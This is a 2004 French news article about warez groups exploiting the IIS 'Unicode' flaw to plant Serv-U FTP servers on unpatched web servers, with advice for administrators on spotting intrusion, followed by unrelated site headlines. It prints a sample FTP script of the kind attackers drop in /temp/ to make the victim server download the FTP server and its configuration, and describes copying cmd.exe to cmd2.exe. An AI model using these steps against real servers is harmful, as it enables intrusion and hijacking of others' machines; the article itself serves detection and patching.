Publié le 22-02-2004 dans le thème Contrefaçon

Pays : International - Auteur : Albert Einstein

Pub : Jouez à Seafight sur Bigpoint.fr et devenez le roi de l´océan!

Depuis 1999, une faille visant les serveurs IIS de Microsoft permet, avec une simple ligne de code, d'accéder au disque dur d'un serveur connecté au réseau. Les groupes de warez ont trés vite compris l'utilité de ce probléme.

Depuis 1999, une faille visant les serveurs IIS de Microsoft permet, avec une simple ligne de code d'accéder au disque dur d'un serveur connecté et non patché face à cette faille communément appelée Unicode. Un simple ligne de commande lancée dans votre logiciel de navigation et il est possible de modifier l'ensemble du contenue des disques durs d'un ordinateur équipé d'un serveur web IIS. Pour vois si votre serveur est faillible, nous vous proposons d'ailleurs notre logiciel ZunicoZ qui vous automatise cette recherche d'un clic de souris. Après la médiatisation de cette faille, due entre autre par le virus code red, on aurait pu penser que cette faille avait certainement disparu du réseau. Et bien détrompez-vous, elle est toujours aussi présente et certains logiciels, comme "nicode", permettent de scanner l'Internet à la recherche de ces serveurs si facile à pénétrer. Cette possibilité est utilisée par les groupes de warez qui ont vu, certains de leurs membres, se spécialiser dans le piratage de serveur IIS.

Sesame, ouvre toi !
Le principe est simple. Le pirate prend une adresse ip d'un serveur sensible à cette faille. Des listes circulent, souvent fournies par les scanneurs des groupes de warez. Grâce àune dizaine de commandes envoyées au serveur, cela va permettre de télécharger sur la machine cible, un serveur ftp (Généralement serv-u.exe, ndlr) ainsi que sa configuration comprenant généralement deux comptes : Le premier, celui de l'admin. Un compte qui donne les droits complets d'accès. Un accés uniquement diffusé aux "Supplyers", les fournisseurs/diffuseurs de la team warez.

L'autre compte offre seulement la possibilité aux internautes de télécharger les releases (Jeux, logiciels, films ou albums piratées, ndlr.). Il ne peut rien effacer, ni modifier. Les teams warez peuvent ainsi utiliser des DD de plusieurs dizaines de giga octets sans craintes de laisser une trace. Celles-ci seront effacées par un membre ayant un accès admin.

Faites donc attention, si votre ordinateur est équipé d'un serveur IIS, vous hébergez peut-être déjà des logiciels piratés a l'insu de votre plein grès.

Solution et dépendance
Voici quelques solutions pour repérer si une quelconque personne a tenté ou mis un serveur ftp sur votre ordinateur. Pour son confort le pirate va copier le fichier cmd.exe, initialement dans winnt/system32, vers le dossier /temp/ avec comme nom cmd2.exe.

Si vous trouver cmd2.exe dans le répertoire /temp/ il semble que quelqu'un a déjà eu accès à votre machine. Toujours dans le répertoire /temp/ vous pouvez trouver un fichier texte ayant cette forme:

open "ftp.adresse.com"
user "login"
"pass"
get nomduserveur.exe
get nomdufichierconfig.ini
quit

Les termes entre guillemets sont bien sur dépendants du pirate. Dans 90 % des cas vous trouverez le mot leech en login, voir même en mot de passe. Vous avez ici le fichier qui va permettre au pirate de faire télécharger au serveur web le serveur ftp ainsi que sa configuration sur un compte ftp. (Généralement le ftp sera celui d'un hébergeur gratuit, ndlr)

Les fichiers précédents vont être télécharger dans c:\Inetpub\scripts. Si vous trouvez dans ce répertoire les fichiers précédents, il faut les supprimer. Attention, cela ne règle que temporairement le problème. La meilleure solution étant bien sur de patcher votre serveur avec le correctif disponible sur le site de Microsoft. Pensez à lancer une recherche sur votre machine, car ces programmes peuvent être installés autre part.

Une autre méthode pour savoir si votre pc n'est pas transformé en ftp pirate. Recherchez les mots suivant : mp3, divx, xbox, ps2, warez, iso, appz. Une autre recherche sur le terme serv-u pourra vous éclairer un peu mieux sur une éventuelle visite warezienne. Bien sur, les plus malins auront modifié le nom du fichier en wazzaaa.exe ou un nom encore plus difficile à détecter, comme systems.exe.

ISOC ECC contre le projet HADOPI, une opposition argumentée

La Coordination Européenne de l'Internet Society contre le projet HADOPI : une opposition argumentée.

Regarder gratuitement et légalement le nouveau film de Michael Moore

Le réalisateur américain Michael Moore va propose aux américains de visionner gratuitement et légalement sur Internet son prochain brulot cinématographique, Slacker Uprising.

Un virus sur le site du Nouvel Observateur

Étrange apparition sur le site officiel du journal Le Nouvel Observateur. Une alerte virus informatique inquiétante.

La France diffuse des brochures pour protéger les enfants sur Internet

La secrétaire d'État à la Famille, Nadine Morano, lance une campagne d'information via 4.5 millions de brochures afin de protéger les enfants sur Internet.

18 mois de prison pour une sale e-blague

Un étudiant écope de 18 mois de prison ferme pour avoir poster sur un site du gouvernement Chinois une fausse alerte au tremblement de terre.

Un pirate nord-coréen arrêté pour e-espionnage

Un internaute de 34 ans arrêté pour avoir orchestré un espionnage électronique très ciblé à l'encontre du Ministère de la Défense.

12 millions de nouvelles données bancaires dans la nature

En février dernier, une banque new-yorkaise annonçait avoir perdu 4 millions de données bancaires. Il semble que cela soit trois fois plus.

Des bulletins de votes optiques disparaissent en Floride

Les élections présidentielles américaines arrivent. Déjà les premiers problèmes informatiques annoncés.

Piratage en Russie: la police dépassée

Piratage audio-vidéo en Russie: le droit d'auteur mal protégé. 806.000 produits saisis.

Batman The Dark Knight, roi du warez

Exclu : Le nouveau Batman envahi Internet. Une version DVD siglée Warner Bros vient de débarquer en force sur la toile.

Guns N' Roses hacked, le pirate owned

Le prochain album de Guns N' Roses sur le web, le blogueur qui avait divulgué des singles de l’album Chinese Democracy arrêté.

Open Market: Les studios de cinéma sous le même DRM anti pirates

Plusieurs importants studios de cinéma s'unissent sous le même système de gestion numérique des droits.

Microsoft lance un nouveau chasseur de pirates

Ecran noir pour les pirates. Microsoft vient de mettre en ligne un nouveau traqueur de Windows XP pro contrefaits.

15 mois de prison pour revente de jeux Nintendo

Un vendeur d'une console de salon intégrant des jeux Nintendo NES écope de 15 mois de prison et 415.000 dollars d'amende.

Des pirates de films dans une base militaire

Des pirates de films dans une base militaireUne association en charge des droits hollywoodiens met la main sur 5 militaires pirates de film. Ils avaient installé leurs graveurs dans leur base.

Operation Takedown: plus de 7 millions de DVD pirates saisis

Coup de balais dans le business des contrefacteurs de films. 56 cameurs arrêtés, 1.000 graveurs saisis.

Réagissez à ce contenu